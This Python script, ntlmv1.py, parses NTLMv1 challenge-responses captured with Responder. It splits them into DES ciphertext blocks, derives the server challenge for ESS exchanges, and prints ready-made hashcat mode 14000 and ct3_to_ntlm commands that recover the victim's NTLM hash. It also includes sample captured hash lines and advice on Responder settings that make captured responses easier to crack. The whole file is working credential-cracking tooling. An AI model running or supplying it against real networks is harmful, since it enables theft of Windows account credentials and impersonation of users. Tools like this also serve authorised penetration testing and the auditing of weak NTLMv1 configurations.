ntlmv1.py
import hashlib, binascii
import argparse
import json
# An LM response whose hex tail [20:48] is all zeros is how this script tells an
# ESS exchange apart from a plain NTLMv1 one (the ESS branch below re-derives the
# server challenge from the client nonce carried in the first 16 hex chars).
_ESS_LM_TAIL = "0000000000000000000000000000"

parser = argparse.ArgumentParser()
parser.add_argument('--ntlmv1', help='NTLMv1 Hash in responder format', required=True)
parser.add_argument('--hashcat', help='hashcat path, eg: ~/git/hashcat', required=False)
parser.add_argument('--hcutils', help='hashcat-utils path, eg: ~/git/hashcat-utils', required=False)
parser.add_argument('--json', help='if this is set to anything it will output json, eg: --json 1', required=False)
args = parser.parse_args()


def _hashcat_line(hashcat_dir):
    """Return the hashcat -m 14000 command line, rooted at *hashcat_dir* when one was given.

    The returned string carries its own trailing newline, so printing it yields
    a blank separator line, as the original output did.
    """
    if hashcat_dir:
        return (hashcat_dir + "/hashcat -m 14000 -a 3 -1 " + hashcat_dir
                + "/charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1\n")
    return "./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1\n"


def _ct3_line(tool_dir, fallback_prefix, *ct3_args):
    """Return the ct3_to_ntlm.bin command line with *ct3_args* space-joined after it.

    *tool_dir* is the --hcutils directory when given. Otherwise *fallback_prefix*
    is placed verbatim before the binary name: the text output uses "./", the
    JSON output uses "" (both spellings are preserved from the original).
    """
    if tool_dir:
        head = tool_dir + "/ct3_to_ntlm.bin "
    else:
        head = fallback_prefix + "ct3_to_ntlm.bin "
    return head + " ".join(ct3_args)


# Responder line layout: USER::DOMAIN:LMRESP:NTRESP:CHALLENGE (hex fields), e.g.
# SERVER1$::MOG:7EF3F506F5EA510E00000000000000000000000000000000:1217169BD7BE0270A033899BD440016D3E6DACAF5894D504:ff81dfd6b12c269d
# evilmog::DUSTIN-5AA37877:E343946E455EFC72746CF587C42022982F85252CC731BB25:51A539E6EE061F647CD5D48CE6C686653737C5E1DE26AC4C:1122334455667788
hashsplit = args.ntlmv1.split(':')
challenge = hashsplit[5]
lmresp = hashsplit[3]
ntresp = hashsplit[4]
# The NT response is split into three 16-hex-char (8-byte) pieces.
ct1 = ntresp[0:16]
ct2 = ntresp[16:32]
ct3 = ntresp[32:48]
data = {'ntlmv1': args.ntlmv1, 'user': hashsplit[0], 'domain': hashsplit[2], 'challenge': challenge, 'lmresp': lmresp,
        'ntresp': ntresp, 'ct3': ct3}

is_ess = lmresp[20:48] == _ESS_LM_TAIL
# --json given (any value) switches to JSON output; otherwise the human-readable report is printed.
text_mode = args.json is None

if not is_ess:
    # Plain NTLMv1: the server challenge is the last field of the responder line.
    crack_challenge = challenge
    if text_mode:
        report = [
            "Hashfield Split:",
            f"{hashsplit}\n",
            f"Hostname: {hashsplit[2]}",
            f"Username: {hashsplit[0]}",
            f"Challenge: {challenge}",
            f"LM Response: {lmresp}",
            f"NT Response: {ntresp}",
            f"CT1: {ct1}",
            f"CT2: {ct2}",
            f"CT3: {ct3}\n",
            "To Calculate final 4 characters of NTLM hash use:",
            # e.g. ./ct3_to_ntlm.bin 2e1e4bf33006ba41 cb8086049ec4736c
            _ct3_line(args.hcutils, "./", ct3, challenge) + "\n",
            "To crack with hashcat create a file with the following contents:",
            f"{ct1}:{challenge}",
            f"{ct2}:{challenge}\n",
            f'echo "{ct1}:{challenge}">>14000.hash',
            f'echo "{ct2}:{challenge}">>14000.hash\n',
            "To crack with hashcat:",
            _hashcat_line(args.hashcat),
        ]
        for line in report:
            print(line)
else:
    # ESS: the last field is the client challenge; the effective server challenge
    # is the first 16 hex chars of MD5(client challenge || LM response[0:16]).
    clientchallenge = hashsplit[5]
    combinedchallenge = clientchallenge + lmresp[0:16]
    md5hash = hashlib.md5(binascii.unhexlify(combinedchallenge)).hexdigest()
    srvchallenge = md5hash[0:16]
    data['srvchallenge'] = srvchallenge
    crack_challenge = srvchallenge
    if text_mode:
        report = [
            "Hash response is ESS, consider using responder with --lm or --disable-ess with a static challenge of 1122334455667788",
            f"[-] Client Challenge: {clientchallenge}",
            f"[-] LMResp[0:16]: {lmresp[0:16]}",
            f"[-] Combined Challenge: {combinedchallenge}",
            "Hashfield Split:",
            f"{hashsplit}\n",
            f"[-] MD5 Hash of Combined Challenge: {md5hash}",
            f"Hostname: {hashsplit[2]}",
            f"Username: {hashsplit[0]}",
            f"LM Response: {lmresp}",
            f"NT Response: {ntresp}",
            f"SRV Challenge: {srvchallenge}\n",
            "To Calculate final 4 characters of NTLM hash use:",
            # e.g. ./ct3_to_ntlm.bin 2e1e4bf33006ba41 cb8086049ec4736c 338d08f8e26de93300000000000000000000000000000000
            _ct3_line(args.hcutils, "./", ct3, clientchallenge, lmresp) + "\n",
            "To crack with hashcat create a file with the following contents:",
            f"{ct1}:{srvchallenge}",
            f"{ct2}:{srvchallenge}\n",
            f'echo "{ct1}:{srvchallenge}">>14000.hash',
            f'echo "{ct2}:{srvchallenge}">>14000.hash\n',
            "To crack with hashcat:",
            _hashcat_line(args.hashcat),
        ]
        for line in report:
            print(line)

if not text_mode:
    # JSON mode: same derived values as the report, keyed for machine consumption.
    if is_ess:
        data['ct3_crack'] = _ct3_line(args.hcutils, "", ct3, clientchallenge, lmresp)
    else:
        data['ct3_crack'] = _ct3_line(args.hcutils, "", ct3, challenge)
    data['hash1'] = f"{ct1}:{crack_challenge}"
    data['hash2'] = f"{ct2}:{crack_challenge}"
    print(json.dumps(data))